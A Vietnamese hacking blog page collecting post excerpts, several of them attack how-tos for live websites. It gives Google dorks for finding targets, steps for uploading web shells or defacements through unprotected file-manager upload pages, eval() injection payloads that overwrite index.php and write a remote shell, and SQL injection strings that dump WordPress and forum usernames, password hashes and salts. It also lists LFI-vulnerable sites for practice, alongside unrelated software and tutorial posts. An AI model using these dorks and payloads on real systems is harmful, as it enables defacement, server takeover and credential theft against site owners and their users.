
HTML Editor File Upload Exploit

This is a exploit which can be used to upload .JPG and .TXT on the website
Dork: inurl:/HTMLEditor/editor/ 

Use any one above mentioned dork.

Vulnerable URL: http://website/HTMLEditor/editor/filemanager/connectors/uploadtest.html

Now under:
Select the "File Uploader" to use
Change the type to PHP.
Choose your file.
Click on Send it to the Server to upload your file.
If uploaded sucessfully, you will get a message saying "File uploaded
without any error" After the uploading process. In the right hand side
see the Uploaded File URL. From there see your uploded file :D

Demo website:

Xem Thêm


"File Manager" Remote Shell and Deface Upload Vulnerability.

Following is the vulnerability to remotly upload your shell or deface on a vulnerable website.

Google Dorks:
inurl:/filemanager/userfiles/ filetype:pdf
Vulnerable URL:
Now, google the dork and select any website from the search result.
When you will select any website, the URL will be as
Now delete the text after filemanager. Now after deleteing the text URL will be
You will get a upload option, upload your shell or deface there.
Your will will be uploaded in Userfiles directory. z
To view your shell visit the below mentioned URLs:

Xem Thêm


Eval() Vulnerability & Exploitation

File: Eval() Vulnerability & Exploitation
Author: GlaDiaT0R
Hits: 859
date: 2010-05-04

# [+]Title: [Eval() Vulnerability & Exploitation]
# [+] About :
# Written by :  GlaDiaT0R  
# Contact: the_gl4di4t0r[AT]hotmail[DOT]com or berrahal.ryadh[AT]gmail[DOT]com
# Team :  Tunisian Power Team  ( DarkGh0st.Net )
# [+]    Summary:
#           [1]-Introduction
#           [2]-Detection
#           [3]-Vulnerable Source code
#           [4]-Exploiting..


eval () is a PHP function that allows to interpret a given string as PHP code, because eval () is often used in Web applications,
although interpretation of the chain is widely liked manipulated, eval () serves most of the time to execute php code containing previously defined variable.
the problem is that if eval () executes a variable that you can modify the code contained by php eval () will execute as such.
Reminder: eval () allows execution of a given string as PHP code but not write (or if so desired) its content in this page or others, he is content to perform, and display the result.
We will even two different PHP source code using Eval (), the possibilities of PHP code injection and how how to use eval () can change the syntax of PHP code to execute.



PoC 1 :<? phpinfo(); ?>

[ eval() execute the contents of the variable "ev" as PHP code ]


PoC 2 :;

[ eval() execute the contents of the variable "ev" as PHP code (without tags) ]


PoC 3 :

Changing the header or POST variable cited by: phpinfo () [or <? phpinfo ();> php code used . ]
(With the Tamper Data)

[ eval () execute a chain whose variable $ HTTP_USER_AGENT is so just
change your header in PHP code ]


[3]-Vulnerable Source code

PoC 1 :

$Ev = $_GET['ev'];
$string = ($Ev);
$string = preg_replace_callback("/(<\?=)(.*?)\?>/si",create_function('$string','ob_start();eval("$string[2];");$return = ob_get_contents();ob_end_clean();return $return;'),$string);
$string= preg_replace_callback("/(<\?php|<\?)(.*?)\?>/si",create_function('$string','ob_start();eval("print $string[2];");$return = ob_get_contents();ob_end_clean();return $return;'),$string);
echo $string;


PoC 2 :
$Ev = $_GET['ev'];
$eva = stripslashes($Ev);


PoC 3 :

$string = stripslashes($HTTP_USER_AGENT);
$string = preg_replace_callback("/(<\?=)(.*?)\?>/si",create_function('$string','ob_start();eval("$string[2];");$return = ob_get_contents();ob_end_clean();return $return;'),$string);
$string= preg_replace_callback("/(<\?php|<\?)(.*?)\?>/si",create_function('$string','ob_start();eval("print $string[2];");$return = ob_get_contents();ob_end_clean();return $return;'),$string);
echo $string;



Write or Create a page containing : Hacked by ...
<?php $z=fopen("index.php",'w');fwrite($z,("HACKED BY GlaDiaT0R"));fclose($z); ?>


$z=fopen("index.php",'w');fwrite($z,("HACKED BY GlaDiaT0R"));fclose($z);
To insert a remote page include using an url
<?php include(''); ?>


Insertion of a distant code in the vulnerable website
<?php $z=fopen("shell.php",'w');fwrite($z,file_get_contents(""));fclose($z); ?>



Thank you for your attention. I hope you understood the process to exploit the eval () vulnerability .

Xem Thêm


[Ebook] Tổng hợp các bài tham luận tại tetcon 2012

1. Phát hiện lỗi phần mềm thông qua kỹ thuật Fuzzing thông minh-Phạm Văn Toàn
2. Những lỗ hổng ít được biết đến và cách phòng chống-Dương Ngọc Thái
3. Mua hàng không mất tiền lỗ hổng trong hệ thống thanh toán trực tuyến tại Việt Nam-Nhâm Xuân Nam
4.Tấm công sandbox và sử dụng AV làm tấm lá chắn bảo về malware- Nguyễn Phố Sơn
5.Tấn Công Beats-Juliano Rizzo
6. Hai kỹ thuật tối ưu tấn công Blind SQL Injection- Nguyễn Hoàng Thịnh

Xem Thêm


Video book khổng lồ về lập trình và tin học

Bộ video book tổng hợp khá đầy đủ các giáo trình về tin học, lập trình. Trong link có giáo trình PHP, C, SQL... và còn rất rất nhiều nữa anh em mở link ra xem sẽ rõ. Giáo trình được thực hiện bằng video nên dễ hiểu và trực quan hơn đọc ebook.
Share cho anh em nhất là các anh em đang bắt đầu học code.
Link download:

Xem Thêm


Auto Clicker 3.0 [No Virus]

Free Mouse Auto Clicker 3.0

Free Mouse Auto Clicker 3.0 là phần mềm giúp bạn tự động click (Auto Click) vào 1 nơi bất kỳ trên màn hình mà không cần phải ngồi bấm chuột.

Hướng dẫn sử dụng:
Sau khi khởi động chương trình,
1. Bạn thiết lập thời gian giãn cách tại mục Click Interval.
2. Click Options là nơi bạn thiết lập sẽ tự động click chột trái hay chuột phải, click 1 cái hay click đúp
3. Ở mục Click Hotkey, bạn có thể thiết lập phím tắt sẽ bắt đầu tự động click và phím tắt ngưng tự động click
4. Bấm start để bắt đầu hoặc có thể dùng phím tắt đã thiết lập ở mục Click Hotkey.
5. Sau khi start thì bạn rê con chuột đi bất cứ vị trí nào trên màn hình thì nó sẽ tự động click liên tục ở vị trí đó (Thời gian giãn cách giữa 2 click phụ thuộc vào bạn thiết lập ở "Click Interval" thế nào).
6. Nếu bạn không muốn auto click nữa thì click vào nút Stop hoặc bấm phím tắt đã thiết lập ở Click Hotkey


Kết quả kiểm tra Virus trên

SHA256: 1563c8d90c3fc85b6b741d51df74caf94f1783028e35005294 fe17a95fd99eac
SHA1: 09036ddbd6a90cc872e06eb4b56336de81c000bb
MD5: 2aded45593b0d1377474808a129b6032
File size: 458.0 KB ( 468946 bytes )
File name: FreeMouseAutoClickerSetup.exe
File type: Win32 EXE
Tags: peexe
Detection ratio: 0 / 37

Antivirus Result Update
AhnLab-V3 - 20120922
AntiVir - 20120922
Antiy-AVL - 20120911
Avast - 20120922
AVG - 20120922
BitDefender - 20120922
ByteHero - 20120922
CAT-QuickHeal - 20120922
ClamAV - 20120922
Commtouch - 20120922
Comodo - 20120922
DrWeb - 20120922
Emsisoft - 20120919
ESET-NOD32 - 20120922
F-Prot - 20120922
Fortinet - 20120922
GData - 20120922
Ikarus - 20120922
Jiangmin - 20120922
K7AntiVirus - 20120921
Kaspersky - 20120922
McAfee - 20120922
McAfee-GW-Edition - 20120922
Microsoft - 20120922
Norman - 20120922
nProtect - 20120921
PCTools - 20120922
Sophos - 20120922
SUPERAntiSpyware - 20120911
Symantec - 20120922
TheHacker - 20120920
TotalDefense - 20120921
TrendMicro - 20120922
TrendMicro-HouseCall - 20120922
VBA32 - 20120921
VIPRE - 20120922
ViRobot - 20120922

Xem Thêm


list site dính LFI cho nb thực hành :)

23 -[LFI]
24 -[LFI]
25 -[LFI]
26 -[LFI]
27 -[LFI]
28 -[LFI]
29 -[LFI]
30 -[LFI]
31 -[LFI]
32 -[LFI]
33 -[LFI]
33 -[LFI]
34 -[LFI]
35 -[LFI]
36 -[LFI]
37 -[LFI]
38 -[LFI]
39 -[LFI]
40 -[LFI]

Nguồn: HF

Xem Thêm


Video hướng dẫn cài đặt SQL Server 2008

Hướng dẫn cài SQL Server 2008 cho mọi người.

Tại mình thấy hôm trước trên sbox VHB có một mem của vhb kêu là không cài được SQL Server. Sau đây là Video hướng dẫn cài Từ A->Z cho AE.

Hướng dẫn cài đặt SQL Server 2008 nhé (hơn 8Mb nén).


pass: vhb

Nguồn : VHB

Xem Thêm


WordPress PhotoRacer Plugin(Attachment) SQL Exploit

Hi aLL ! I am OrucReis 

Coder ; OrucReis
Country ; TURKEY

I am tell WordPress PhotoRacer Plugin(Attachment).
I have found this vulnerability :)
I hope that is helpful...

Dork ; inurl:"mostvoted.php?pid="

Exploit ; mostvoted.php?pid=-xx union select 1,2,3,4,concat_ws(user_login,user_pass),6,7 from wp_users

OR ;

Username= mostvoted.php?pid=-xx union select 1,2,3,4,user_login,6,7 from wp_users
Password= mostvoted.php?pid=-xx union select 1,2,3,4,user_pass,6,7 from wp_users

Admin Panel= /wp-login.php , /wp-login/ , /wp-admin.php or /wp-admin/

MD5 Crack;

Xem Thêm


[New bug] sqli INURL:infernoshout.php

1.Sử dụng dork trên google


2. Exploit link: infernoshout.php?do=options&area=commands

3. Ném vào phần input dòng bên dưới còn output điền gì cũng đc.  


' and (select 1 from (select count(*),concat((select(select concat(cast(concat(username,0x3a,password,0x3a,salt) as char),0x7e)) from user where userid=1 limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) AND ''='#
4. nếu hiện DATABASE ERROR thì xem mã nguồn của nó kéo xuống bên dưới hiện ra kết quả

Đã thử vài site không chơi đc kiểu này 


Xem Thêm


SQL - TUT Magic convert & Error based

Magic Convert

Xem Thêm


Copyright © Dương-UG Blog's - Nguyễn Bình Dương